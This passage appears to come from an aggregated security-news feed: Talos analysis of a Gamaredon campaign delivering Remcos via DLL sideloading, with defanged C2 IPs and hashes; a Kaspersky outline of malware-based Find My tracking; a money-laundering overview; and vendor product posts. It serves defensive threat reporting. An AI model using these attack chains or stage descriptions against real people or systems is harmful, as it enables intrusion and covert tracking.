gthost 

146[.]185[.]233[.]97 

63023 

gthost 

146[.]185[.]233[.]98 

63023 

gthost 

146[.]185[.]239[.]47 

63023 

gthost 

146[.]185[.]239[.]56 

63023 

gthost 

146[.]185[.]239[.]33 

63023 

gthost 

146[.]185[.]239[.]60 

63023 

gthost 

 

These servers are used to distribute the payload and the decoy document, but Talos found evidence of at least one server being used as the Command and Control (C2) server for the Remcos backdoor. 

We have also found evidence of an interesting artifact in the DNS resolution for some of these servers. Even though all the communication with these servers is done directly via the IP address, the reverse DNS record for some of these IPs show an invalid entry that is quite unique: 

Gamaredon campaign abuses LNK files to distribute Remcos backdoor
Gamaredon campaign abuses LNK files to distribute Remcos backdoor

Figure: Reverse DNS resolution for Gamaredon’s campaign. Modeled using Crime Mapper (by @UK_Daniel_Card

While this doesn’t necessarily mean the attackers manually changed these records, it did help uncover at least two additional IPs matching the characteristics of the other servers in this campaign: 

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

  

DLL sideloading used to load Remcos backdoor 

Gamaredon has previously been known to use custom scripts and tools in their attack chains, but Talos has observed the use of Remcos backdoor as an alternative tool in their campaigns. 

Once the ZIP payload is downloaded from the servers, it is extracted to the %TEMP% folder and executed. The binary which is executed is a clean application which in turn loads the malicious DLL via DLL sideloading method. This file is actually a malicious loader which decrypts and executes the final Remcos payload from encrypted files found within the ZIP. 

The PowerShell files we observed downloading the ZIP files contain hints of various applications being abused for DLL side loading, and they contain a mix of clean and malicious files: 

  • DefenderUpdate/DPMHelper.exe 
  • DefenderUpdate/DZIPR.exe 
  • DefenderUpdate/IDRBackup.exe 
  • DefenderUpdate/IUService.exe 
  • DefenderUpdate/madHcCtrl.exe 
  • DefenderUpdate/palemoon.exe 
  • Drvx64/Compil32.exe 
  • Drvx64/IsCabView.exe 
  • Drvx64/TiVoDiag.exe 
  • Drvx64/WiseTurbo.exe 
  • SecurityCheck/Mp3tag.exe 
  • SysDrive/AcroBroker.exe 
  • SysDrive/DPMHelper.exe 
  • SysDrive/IsCabView.exe 
  • SysDrive/palemoon.exe 
  • SysDrive/SbieSvc.exe 
  • SysDrive/steamerrorreporter64.exe 
  • SysDrive/TiVoDiag.exe 
  • SysDrive/vmhost.exe 

We can see in the previously mentioned sample downloaded by “Any.run” that it contains the clean application TivoDiag.exe, as well as two DLLs. The file “mindclient.dll” is the malicious DLL which is loaded by “TivoDiag.exe” during execution. 

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

The payload binary is a typical Remcos backdoor which is injected into Explorer.exe. It communicates with the C2 server 146[.]185[.]233[.]96 on port 6856: 

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

Coverage 

Ways our customers can detect and block this threat are listed below. 

 

Gamaredon campaign abuses LNK files to distribute Remcos backdoor

 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

Snort SIDs for this threat:  

Snort 2: 64707, 64708 

Snort 3:  301171 

Indicators of Compromise 

IOCs for this threat can be found in our GitHub repository here.    

Cisco Talos Blog – ​Read More

ANY.RUN Wins Globee Awards 2025 for Outstanding Threat Detection and Response

The Globee Awards is an annual competition celebrating companies in various fields, including technology-related businesses, since 2003. This year, the winners were announced on March 13, and ANY.RUN is one of them! We earned silver in the Outstanding Threat Detection and Response category. 

Thank You! 

It’s a pleasure to share the news with our lovely community and once again express gratitude to everyone who joined us on the adventure to a safer future and better tools for cybersecurity professionals. 

A new milestone on this journey was achieved by our flagship product, ANY.RUN Interactive Sandbox. As part of the awards, it was evaluated by a panel consisting of over 1,500 experts from around the world. Based on their scores and detailed reviews, the Sandbox was recognized as one of the best cybersecurity solutions.  

The Value We Bring  

Among the advantages of our product that especially benefit businesses are highlighted: 

  • Real-time analysis and constant updates: we always keep our users up-do-date on emerging threats and give the opportunity to analyze potentially dangerous files in seconds. 
  • Safety of sensitive data: our private mode allows you to upload any info that must stay confidential. No one but you will have access to it. ANY.RUN fully complies with SOC 2 and GPDR.  
  • Lowering financial risks: with ANY.RUN’s sandbox, SOC specialists can react to threats fast, thus minimizing harmful consequences or avoiding them altogether. As a result, the company budget won’t suffer. 

Equip your team with the malware analysis tool
to detect threats faster 



Sign up for ANY.RUN


We work hard to make ANY.RUN Interactive Sandbox a top-notch solution to your malware analysis needs and are happy to see that our efforts were recognized by the award committee. 

Cybersecurity at Globee Awards 2025  

San Madan, President of the Globee Awards, congratulated us and other winners in our category, noting the importance of fighting cyber threats: 

We are excited to celebrate the remarkable achievements of organizations, cybersecurity professionals, and innovators who are influencing the future of cybersecurity. These winners demonstrate resilience, innovation, and a dedication to safeguarding businesses and individuals from the evolving threats in the cyber landscape.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Integrate ANY.RUN’s services in your organization to strengthen your security → 

The post ANY.RUN Wins Globee Awards 2025 for Outstanding Threat Detection and Response appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Protecting Android, Windows, and Linux devices against being tracked via the Find My network | Kaspersky official blog

AirTags are a popular tracking device used by anyone from forgetful key owners to those with malicious intent, such as jealous spouses and car thieves. Using AirTags for spying is simple: a tag is discreetly placed on the target to allow their movements to be conveniently monitored using Apple Find My. We’ve even added protection from AirTag-based tracking to our products for Android.

But a recent study by security researchers has surprisingly found that remote tracking doesn’t even depend on buying an AirTag or ever being physically near the target. If you manage to sneak special malware onto someone’s Windows, Android, or Linux device (like a computer or phone), it could use the device’s Bluetooth to send out a signal that nearby Apple devices would think is coming from an AirTag. Essentially, for Apple devices, the infected phone or computer effectively becomes an oversized AirTag – trackable via the Find My network, which boasts over a billion Apple phones and tablets.

Anatomy of the attack

The attack exploits two features of the Find My technology.

Firstly, this network uses end-to-end encryption – so participants don’t know whose signals they’re relaying. To exchange information, an AirTag and its owner’s phone rely on a pair of cryptographic keys. When a lost AirTag broadcasts its “callsigns” via Bluetooth, Find My network “detectors” (that is, any Apple device with Bluetooth and internet access, regardless of who owns it) simply transmit AirTag’s geolocation data to Apple servers. The data is encrypted with the lost AirTag’s public key.

Then, any device can ask for the encrypted location data from the server. And because it’s encrypted, Apple doesn’t know who the signal belongs to, or which device asked for it. The crucial point here is that one can only decrypt the data and find out both whose AirTag it is and its exact location by having the corresponding private key. Therefore, this data is only useful to the owner of the smartphone paired with this AirTag.

Another feature of Find My is that detectors don’t verify whether the location signal indeed originated with an Apple device. Any devices that support Bluetooth Low Energy (BLE) can broadcast it.

To exploit these features, the researchers came up with the following method:

  1. They install malware on a computer, phone, or some other device running Android, Windows, or Linux, and check the Bluetooth adapter address.
  2. The attackers’ server receives the information and uses powerful video cards to generate a pair of encryption keys specific to the device’s Bluetooth address and compatible with Apple’s Find My
  3. The public key is sent back to the infected device, and the malware then starts transmitting a Bluetooth message that mimics AirTag signals and includes this key.
  4. Any nearby Apple device connected to the internet receives the Bluetooth message and relays it to the Find My
  5. The attackers’ server uses the private key to request the location of the infected device from Find My and decrypt the data.

How well does the tracking work?

The more Apple devices nearby and the slower the victim’s movement, the better the accuracy and speed of the location tracking. In typical urban environments like homes or offices, the location is typically pinpointed within six to seven minutes and with an accuracy of around three meters. Even in extreme situations, such as being on an airplane, tracking can still occur because internet access is now widely available on flights. The researchers obtained 17 geolocation points throughout a 90-minute flight, allowing them to reconstruct the aircraft’s flight path quite accurately.

Naturally, the success of the attack hinges on whether the victim can be infected with malware, and the details are slightly different depending on the platform. On Linux devices, the attack only requires infecting the victim’s gadget due to the specific Bluetooth implementation. By contrast, Android and Windows employ Bluetooth address randomization, meaning the attacker needs to infect two nearby Bluetooth devices: one as the tracking target (the one that mimics an AirTag), and another to obtain its adapter address.

The malicious application needs Bluetooth access, but this isn’t hard to get. Many common app categories – like media players, file sharing tools, and even payment apps – often have legitimate reasons to request it. It’s likely that a convincing and functional bait application will be created for this type of attack, or even that an existing application will be trojanized. The attack requires neither administrative permissions nor root access.

Importantly, we’re not just talking about phones and computers: the attack is effective across a range of devices – including smart TVs, virtual-reality glasses, and other household appliances – as Android and Linux are common operating systems in many of them.

Another key part of the attack involves calculating cryptographic keys on the server. Due to the complexity of this operation – which requires leasing hardware with modern video cards – the cost of generating a key for a single  victim is estimated at around $2.2. For this reason, we find mass-tracking scenarios that target, say, visitors inside a shopping center, to be unlikely. However, targeted attacks at this price point are accessible to virtually anyone, including scammers or nosy co-workers and spouses.

Apple’s response

The company patched the Find My network vulnerability in December 2024 in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 (for older devices) and 18.2 (for newer ones), watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2, and macOS Sequoia 15.2. Unfortunately, as is often the case with Apple, the details of the updates have not been disclosed. The researchers emphasize that this tracking method will remain technically feasible until all Apple users update to at least the above versions, though fewer devices will be able to report a tracked device’s location. And it’s not impossible that the Apple patch could be defeated by another engineering trick.

How to protect yourself from the attack

  • Turn off Bluetooth when you’re not using it if your device has the option.
  • When installing apps, stick to trusted sources only. Verify that the app has been around for a long time, and has many downloads and a high rating in its latest version.
  • Only grant Bluetooth and location access to apps if you’re certain you need those features.
  • Regularly update your device: both the OS and main apps.
  • Make sure you have comprehensive malware protection enabled on all your devices. We recommend Kaspersky Premium.

Besides this rather unusual and as-yet-unseen-in-the-wild tracking method, there are numerous other ways your location and activities can be tracked. What methods are being used to spy on you? Read these for the details:

… and other posts.

Kaspersky official blog – ​Read More

Money Laundering 101, and why Joe is worried

Money Laundering 101, and why Joe is worried

Welcome to this week’s edition of the Threat Source newsletter. 

Howdy friends! One of things I learned early on in cyber security is that crime does, in fact, pay. It can pay very well, actually. If it didn’t, we wouldn’t have ransomware cartels raking in obscene amounts of money year after year. Ransomware victims pay ransoms with cryptocurrency — typically Bitcoin. A criminal who has their ill-gotten BTC gains then needs to introduce it into a banking system that lets them spend that crypto currency with no questions asked.  

You might be unsurprised to learn that that isn’t as easy as it sounds, but it’s also not a new problem. In the 1980s, South American drug cartels had a similar issue. They were making obscene amounts of money and had massive piles of cash. However, one cannot show up and start dropping massive amounts of money buying very expensive things without drawing legal attention. Plus, it turns out, cash was the preferred way to bribe corrupt officials. As a result, they found legal and banking loopholes, and less than reputable financial practices in the U.S and in other countries to inject ill-gotten money into a legitimate banking system where they could access the funds.  

This is called money laundering, and it is at the heart of every successful organized crime organization. Money Laundering 101 is done in three basic steps: Placement, Layering, and Integration.  

  1. Placement: You need to get your money into the financial system(s). 
  2. Layering: You need to move the money around so it’s harder to trace and to link it to the crime.  
  3. Integration: Now that the connection to the crime is obfuscated, you can spend that money. You can invest it, buy expensive cars, or whatever. That money is now in someone else’s pocket. I used to joke that Ferrari dealerships don’t exactly accept cryptocurrency, but it turns out that joke is now on me. More and more businesses now accept cryptocurrency as a direct means of payment it seems.  

We often think of the crime of ransomware attacks at the point of impact and victimization, but rarely do we think of the reverse — the money that is paid out that flows back into the cartel and its affiliates. Cryptocurrency is fantastic for money laundering. It lags far behind regulatory standards, is largely anonymous, and can be “mixed” and directed to decentralized exchanges where Know Your Customer (KYC) and Anti-Money Laundering (AML) controls are not applied.  

So why am I bringing this up? Well, law enforcement attacking money laundering infrastructure really works. If you can impact how criminals launder their money, you put the brakes on the crime itself happening. After all, what good are the spoils of crime If you can’t do anything with it? 

My fear is that regulatory climates have shifted, which will allow laundering to more easily happen. Time will tell if I’m right, and I don’t want to be.

The one big thing 

I’m a huge fanboy for clever evasion tactics. Cascading Style Sheets (CSS) evasion tactics in spam emails is just a wicked cool trick. Game knows game, and I have to say, this is super smart. Spam filters play a constant cat and mouse game against adversaries. It goes to show that the threat actors are always innovating neat tricks to exploit victims. 

Why do I care? 

Spam emails account for a massive threat footprint, especially in enterprise email security. Any attack that sneaks malicious spam emails through a spam filter is worth paying attention to. 

So now what? 

Knowing is half the battle. Time to look at your email defenses and shore them up. Consider an email proxy service or something similar to help augment your email threat defense.

Top security headlines of the week 

Airport outages: Malaysia PM says country rejected $10 million ransom demand (The Record

Satellites! I am an absolute sucker for space hacking. ENISA released a great guide on securing commercial space assets. (ENISA)  

One-click phishing attacks: Google hastily patched a Chrome zero-day vulnerability exploited by an APT. (Dark Reading

Can’t get enough Talos? 

  • Patch Tuesday was a doozy this time. Check out our blog post here
  • Also, keep your eyes peeled: Talos’ 2024 Year in Review will be available for download on Monday, Mar. 31. 

Upcoming events where you can find Talos 

  • RSA (April 28 – May 1, 2025) San Francisco, CA 
  • PIVOTcon (May 7 – 9) Malaga, Spain 
  • CTA TIPS 2025 (May 14 – 15, 2025) Arlington, VA 
  • Cisco Live U.S. (June 8 – 12, 2022) San Diego, CA

Most prevalent malware files from Talos telemetry over the past week  

SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5 
MD5: ff1b6bb151cf9f671c929a4cbdb64d86  
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  
Typical Filename: endpoint.query 
Claimed Product: Endpoint-Collector 
Detection Name: W32.File.MalParent     

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
MD5: 71fea034b422e4a17ebb06022532fdde   
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
Typical Filename: VID001.exe  
Claimed Product: N/A    
Detection Name: Coinminer:MBT.26mw.in14.Talos  

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
MD5: 7bdbd180c081fa63ca94f9c22c457376   
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0  
Typical Filename: c0dwjdi6a.dll   
Claimed Product: N/A    
Detection Name: Trojan.GenericKD.33515991   

SHA 256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe  
Detection Name: Simple_Custom_Detection 

Cisco Talos Blog – ​Read More

AI technologies in Kaspersky SIEM | Kaspersky official blog

It’s a rare company these days that doesn’t boast about using artificial intelligence (AI). And often no explanation is forthcoming as to why AI is needed or, more importantly, how it’s implemented — just the mere presence of AI, it seems, is enough to make a product more valuable, innovative and high-tech. Kaspersky advocates a different approach: we don’t just say “we use AI”, but explain exactly how we deploy machine learning (ML) and AI technologies in our solutions. It’d take too long to list all our AI technologies in a single post given that we have an entire expertise center — Kaspersky AI Technology Research — that deals with all aspects of AI. So my sole focus here will be on those technologies that make life easier for SIEM analysts working with the Kaspersky Unified Monitoring and Analysis Platform.

SIEM AI Asset Risk Scoring

In traditional systems, one of the most resource-intensive tasks of the SIEM analyst is prioritizing alerts — especially if the system has just been installed and works out of the box with default correlation rules not yet fine-tuned to the infrastructure of a specific company. Big data analytics and AI systems can help here. Armed with SIEM AI Asset Risk Scoring, monitoring and response teams can prioritize alerts and prevent potential damage. The module assesses asset risks by analyzing historical data and prioritizing incoming alerts, allowing to speed up triage and generate hypotheses that can be used for proactive searches.

SIEM AI Asset Risk Scoring

Based on information about activated correlation rule chains, SIEM AI Asset Risk Scoring lets you build patterns of normal activity on endpoints. Then, by comparing daily activity with these patterns, the module identifies anomalies (for example, sudden traffic spikes or multiple service requests) that may signal a real incident and prompt the analyst to take a deeper look into these alerts. This way, the problem is detected early, before any damage is done.

AI-Powered OSINT IoCs

Analysts working with the Kaspersky Unified Monitoring and Analysis Platform also have the option to use additional contextual information from open sources through the Kaspersky Threat Intelligence Portal. After the latest update, the portal now provides access to threat intelligence collected using a generative AI model.

It works as follows: let’s say you’ve found a suspicious file during a threat hunt. You can take this file’s hash and look it up on the site, and if someone else has already encountered it during an incident investigation and published something about it, the technology will instantly show you indicators of compromise (IoC) and key facts about the threat. Without such an automation system, it can take the analyst many hours to find and review this information — especially if there are lots of materials and they’re written in different languages. Our system, built on an internal LLM model, can automate this process: it analyzes all reports and mentions of the threat whatever the language, extracts the essence, and presents a summary: the nature of the threat, the date it was detected first, cybercriminal groups associated with it, industries most often targeted using the file, and so on. This saves the analyst an enormous amount of time on searching and researching.

What’s more, the analyst has access to other Kaspersky Threat Intelligence data, including information generated using AI technologies and big data analytics. Our threat intelligence databases are continuously updated with the results of manual APT research, live data from the darknet, information from the Kaspersky Security Network, and regular analysis of new malware. All of these technologies help users minimize the potential damage from cyber-incidents and reduce the Mean Time to Respond (MTTR) and the Mean Time to Detect (MTTD).

 

We continue to improve the usability and performance of our SIEM system, with a focus on deploying AI to free information security employees from even more routine tasks. Follow updates of the Kaspersky Unified Monitoring and Analysis Platform on the official product page.

Kaspersky official blog – ​Read More